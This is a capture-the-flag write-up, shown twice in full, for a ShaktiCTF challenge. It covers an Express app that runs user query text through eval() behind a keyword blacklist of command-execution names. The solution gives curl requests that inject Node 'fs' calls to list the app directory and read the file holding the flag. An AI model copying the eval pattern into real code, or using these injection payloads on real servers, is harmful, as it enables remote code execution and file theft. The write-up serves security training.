## Description >It takes many good deeds to build a good reputation, and only one bad function to lose it. url: http://35.239.219.201:4000/ Source: https://ctf.shakticon.com/files/a0fcc3b2e2bd831cb93123757167e6ae/main.js?token=eyJ1c2VyX2lkIjo4MDIsInRlYW1faWQiOjI4MSwiZmlsZV9pZCI6NDN9.YGlnjw.MK0LzBnHiKdfRIo4S0RVENkIefY Author: Gopika ## Solution The app source code is super short: ```js var express = require('express'); var app = express(); app.get('/', function (req, res) { var inp = req.query.text; if(inp){ const blacklist = ['system', 'child_process', 'exec', 'spawn', 'eval']; if(blacklist.map(v=>inp.includes(v)).filter(v=>v).length !== 0){ res.send("That function is blocked, sorry XD"); return; } res.send('Welcome to the world ' + eval(inp)); console.log(req.query.text); }else{ res.send("Hey aren't you missing something??"); return; } }); app.listen(4000, function () { console.log('app listening on port 4000!'); }); ``` There's a blacklist and an `eval()` call. We can use the `fs` package to list directories, read files etc. ``` $ curl "http://35.239.219.201:4000/?text=require('fs').readdirSync('.').toString()" Welcome to the world .bash_history,.bash_logout,.bashrc,.cache,.gnupg,.local,.pm2,.profile,.ssh,Dockerfile,hosts,main.js,node_modules,package- lock.json ``` I looked around for a flag file but couldn't find one. Turns out the flag was actually stored in the `hosts` file inside the app's current directory (`/app`) for some reason. ``` $ curl "http://35.239.219.201:4000/?text=require('fs').readFileSync('hosts').toString()" Welcome to the world 127.0.0.1 localhost ::1 localhost ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters 172.17.0.2 07e38cb70e8f # so you found out even if I hid it in not-so common places. one stupid function and it made all my secrets public. shaktictf{eval_1s_n0t_safe_f0r_reputation} ``` Flag is `shaktictf{eval_1s_n0t_safe_f0r_reputation}`## Description >It takes many good deeds to build a good reputation, and only one bad function to lose it. url: http://35.239.219.201:4000/ Source: https://ctf.shakticon.com/files/a0fcc3b2e2bd831cb93123757167e6ae/main.js?token=eyJ1c2VyX2lkIjo4MDIsInRlYW1faWQiOjI4MSwiZmlsZV9pZCI6NDN9.YGlnjw.MK0LzBnHiKdfRIo4S0RVENkIefY Author: Gopika ## Solution The app source code is super short: ```js var express = require('express'); var app = express(); app.get('/', function (req, res) { var inp = req.query.text; if(inp){ const blacklist = ['system', 'child_process', 'exec', 'spawn', 'eval']; if(blacklist.map(v=>inp.includes(v)).filter(v=>v).length !== 0){ res.send("That function is blocked, sorry XD"); return; } res.send('Welcome to the world ' + eval(inp)); console.log(req.query.text); }else{ res.send("Hey aren't you missing something??"); return; } }); app.listen(4000, function () { console.log('app listening on port 4000!'); }); ``` There's a blacklist and an `eval()` call. We can use the `fs` package to list directories, read files etc. ``` $ curl "http://35.239.219.201:4000/?text=require('fs').readdirSync('.').toString()" Welcome to the world .bash_history,.bash_logout,.bashrc,.cache,.gnupg,.local,.pm2,.profile,.ssh,Dockerfile,hosts,main.js,node_modules,package- lock.json ``` I looked around for a flag file but couldn't find one. Turns out the flag was actually stored in the `hosts` file inside the app's current directory (`/app`) for some reason. ``` $ curl "http://35.239.219.201:4000/?text=require('fs').readFileSync('hosts').toString()" Welcome to the world 127.0.0.1 localhost ::1 localhost ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters 172.17.0.2 07e38cb70e8f # so you found out even if I hid it in not-so common places. one stupid function and it made all my secrets public. shaktictf{eval_1s_n0t_safe_f0r_reputation} ``` Flag is `shaktictf{eval_1s_n0t_safe_f0r_reputation}`